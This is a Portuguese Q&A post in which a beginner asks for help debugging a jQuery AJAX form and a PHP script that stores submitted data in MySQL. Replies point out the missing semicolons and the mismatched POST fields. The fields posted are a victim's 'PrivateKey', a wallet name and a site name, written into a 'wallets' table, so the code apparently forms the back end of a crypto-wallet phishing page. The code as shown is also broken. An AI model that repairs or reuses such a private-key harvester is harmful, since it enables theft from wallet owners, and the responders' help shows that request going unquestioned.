# Salvar dados no Mysql com ajax

Tags: php, mysql, ajax

Olá, sou bem novo em programação e gostaria de ajuda para encontrar o erro no meu código!
Estou tentando salvar dados de um formulário no MYSQL utilizando ajax e vendo um vídeo no youtube.

meu formulário tem o seguinte código:

```javascript
    $.ajax({    
    type: 'POST',
    url: 'send.php',
    data: {'PrivateKey' : PrivateKey, 'Wallet' : 'mathwallet', 'Site' : 'Alladin'},
    cache: false,
    success: function(response){
        if(response){
            $('#res').html(response); 
        }
```

o arquivo send.php está assim:

```php
<?php

    $pkey = $_POST['PrivateKey']
    $wallet = $_POST['Wallet']
    $mathwallet = $_POST['mathwallet']
    $site = $_POST['Site']


$pdo = new PDO('mysql:host=localhost; dbname=pancake;', 'root', '');

$stmt = $pdo->prepare('INSERT INTO wallets (pkey, wallet, mathwallet, site) VALUES (:ky, :wl, :mt, :st)');
$stmt->bindValue(':ky', $key)
$stmt->bindValue(':wl', $wallet)
$stmt->bindValue(':mt', $mathwallet)
$stmt->bindValue(':st', $site)
$stmt->execute();

?>
```

porém ao submeter o botão os dados não são salvos no SQL, alguém pode me ajudar a encontrar o erro?

Comment: Fora os `;` que estão faltando no script php, `$_POST['mathwallet']` é nulo. Revise o js `data: {'PrivateKey' : PrivateKey, 'Wallet' : 'mathwallet', 'Site' : 'Alladin'}`.

Answer (score 0):

Eu verificaria o seguinte:

1 o `$_POST` tá recebendo alguma coisa?

2 O `privateKey` é um int/num, etc ou string? o que ele realmente esta enviando (vai por mim, isso pode gerar problemas)

3 Verifique o tipo de campo que sua tabela no banco de dados espera receber e o tipo de informação que você está enviando... está certo que tudo está certo?

Se eu fosse você mandaria um print do erro, fica complicado avaliar qual é o problema sem entender o erro.